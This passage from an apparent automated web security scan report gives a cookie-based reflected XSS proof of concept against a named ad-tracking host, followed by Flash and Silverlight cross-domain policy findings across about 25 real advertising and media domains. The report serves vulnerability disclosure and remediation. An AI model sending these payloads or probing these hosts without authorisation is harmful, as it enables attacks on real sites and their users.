This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376fc3e2<script>alert(1)</script>0fb8136e609; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 26-Jun-2011 13:44:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-53_17942365681308836693; expires=Tue, 21-Jun-2016 13:44:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_17942365681308836693; expires=Thu, 23-Jun-2011 13:59:53 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376fc3e2<script>alert(1)</script>0fb8136e609';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17942365681308836693';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTca
...[SNIP]...

4. Flash cross-domain policy previous next
There are 25 instances of this issue:

http://a.tribalfusion.com/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://ad.turn.com/crossdomain.xml
http://aperture.displaymarketplace.com/crossdomain.xml
http://api.facebook.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://cdn.turn.com/crossdomain.xml
http://data.inskinmedia.com/crossdomain.xml
http://dp.specificclick.net/crossdomain.xml
http://ds.serving-sys.com/crossdomain.xml
http://external.ak.fbcdn.net/crossdomain.xml
http://i.w55c.net/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://img.mediaplex.com/crossdomain.xml
http://js.revsci.net/crossdomain.xml
http://adadvisor.net/crossdomain.xml
http://api.demandbase.com/crossdomain.xml
http://api.tweetmeme.com/crossdomain.xml
http://delivery.steelhousemedia.com/crossdomain.xml
http://edge.sharethis.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://ibnlive.in.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Thu, 23 Jun 2011 13:44:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://ad.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Thu, 23 Jun 2011 13:44:52 GMT
Content-Type: text/xml;charset=UTF-8
Date: Thu, 23 Jun 2011 13:44:51 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.4. http://aperture.displaymarketplace.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://aperture.displaymarketplace.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:fcb"
Server: Microsoft-IIS/6.0
X-Server: D2H.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Thu, 23 Jun 2011 13:44:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Jun 2011 13:44:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control perm
...[SNIP]...

4.5. http://api.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 23 Jul 2011 13:44:54 GMT
X-FB-Server: 10.36.31.127
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.6. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 24 Jun 2011 11:13:03 GMT
Date: Thu, 23 Jun 2011 11:13:03 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.7. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205350000"
Last-Modified: Thu, 15 Jul 2010 14:49:10 GMT
Content-Type: application/xml
Content-Length: 384
Date: Thu, 23 Jun 2011 13:44:51 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 23 Jun 2011 13:44:27 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.9. http://cdn.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Thu, 23 Jun 2011 13:44:53 GMT
Date: Thu, 23 Jun 2011 13:44:53 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.10. http://data.inskinmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://data.inskinmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: data.inskinmedia.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 23 Jun 2011 13:43:31 GMT
Content-Type: text/xml
Content-Length: 327
Last-Modified: Tue, 03 Nov 2009 12:03:42 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.11. http://dp.specificclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dp.specificclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Thu, 23 Jun 2011 11:13:02 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.12. http://ds.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 23 Jun 2011 13:44:28 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.13. http://external.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Thu, 23 Jun 2011 13:45:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.14. http://i.w55c.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:54 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 rhv192176010000 (MII-APC/1.6)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" to-ports="*"/>
<site-control
...[SNIP]...

4.15. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 24-Jun-2011 14:18:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 21-Sep-2011 14:18:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.16. http://img.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:45:32 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.17. http://js.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 23 Jun 2011 11:11:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.18. http://adadvisor.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:55 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

4.19. http://api.demandbase.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.demandbase.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.demandbase.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 23 Jun 2011 13:44:20 GMT
ETag: "12c02d-113-4a62818833fc0"
Last-Modified: Mon, 20 Jun 2011 17:30:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 275
Connection: Close

<cross-domain-policy>
<allow-access-from domain="*.demandbase.com" to-ports="80,443" secure="false" />
<allow-access-from domain="*.fireraven.com" to-ports="80,443" secure="false" />
<site-contr
...[SNIP]...

4.20. http://api.tweetmeme.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.tweetmeme.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Jun 2011 13:44:46 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Thu, 23 Jun 2011 13:47:03 +0000 GMT
Etag: 8148b098ca5a903abba8dfde42b2a274
X-Served-By: h00

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

4.21. http://delivery.steelhousemedia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: delivery.steelhousemedia.com

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:45:08 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Fri, 13 Aug 2010 19:02:44 GMT
ETag: "2395d6-114-48db920b45d00"
Accept-Ranges: bytes
Content-Length: 276
Cache-Control: max-age=0, public
Expires: Thu, 23 Jun 2011 13:45:08 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="ui.steelhousemedia.com" />
<allow-access-from domain="*.steelhousemedia.com" />
...[SNIP]...

4.22. http://edge.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://edge.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 15 Jun 2011 21:11:18 GMT
ETag: "3092a-14a-4a5c697ef6980"
Content-Type: application/xml
Date: Thu, 23 Jun 2011 13:08:57 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.23. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=119
Expires: Thu, 23 Jun 2011 13:49:23 GMT
Date: Thu, 23 Jun 2011 13:47:24 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.24. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 22 Jun 2011 15:24:31 GMT
Expires: Thu, 23 Jun 2011 15:24:31 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 80416

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.25. http://ibnlive.in.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ibnlive.in.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ibnlive.in.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 25 Apr 2011 11:57:40 GMT
ETag: "63cf1e-491-4a1bcea14d500"-gzip
Content-Type: application/xml
Expires: Thu, 23 Jun 2011 13:44:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Jun 2011 13:44:28 GMT
Content-Length: 1169
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.in.com" />
<allow-access-from domain="*.ibnlive.in.com" />
<allow-access-from domain="*.cricketnext.in.com" />
<allow-access-from domain="*.ibnlive.com" />
<allow-access-from domain="202.87.42.52" />
<allow-access-from domain="172.31.1.102" />
<allow-access-from domain="*.moneycontrol.com" />
<allow-access-from domain="*.cricketnext.com" />
<allow-access-from domain="*.cricketnext.in.com" />
<allow-access-from domain="in.jobstreet.com" />
<allow-access-from domain="origin-static.ibnlive.com"/>
<allow-access-from domain="*.vdopia.com"/>
<allow-access-from domain="serve.vdopia.com"/>
<allow-access-from domain="adsvdopia.cdnetworks.us"/>
<allow-access-from domain="bckvdopia.cdnetworks.us"/>
<allow-access-from domain="*.247realmedia.com" />
<allow-access-from domain="86.53.218.36" />
<allow-access-from domain="www.cnn-ibn.com"/>
<allow-access-from domain="cnn-ibn.com"/>
<allow-access-from domain="www.mid-day.com"/>
<allow-access-from domain="*.247realmedia.com"/>
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 2 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

